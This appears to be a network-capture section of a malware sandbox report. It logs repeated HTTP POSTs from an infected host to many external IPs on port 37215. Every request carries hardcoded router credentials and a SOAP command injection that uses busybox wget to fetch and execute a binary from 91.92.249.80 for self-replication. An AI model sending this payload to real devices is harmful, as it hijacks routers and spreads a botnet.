                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          552192.168.2.234879468.215.33.23037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196618080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          553192.168.2.235069441.253.175.17937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196630955 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          554192.168.2.2340418157.4.198.2337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196702957 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          555192.168.2.2360860159.47.158.12737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196724892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          556192.168.2.235364641.173.161.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196727991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          557192.168.2.2346592157.37.139.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196765900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          558192.168.2.2356734157.63.208.18237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196765900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          559192.168.2.2358410197.80.156.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196791887 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          560192.168.2.2334400197.173.14.4637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196791887 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          561192.168.2.234898641.184.180.8637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196809053 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
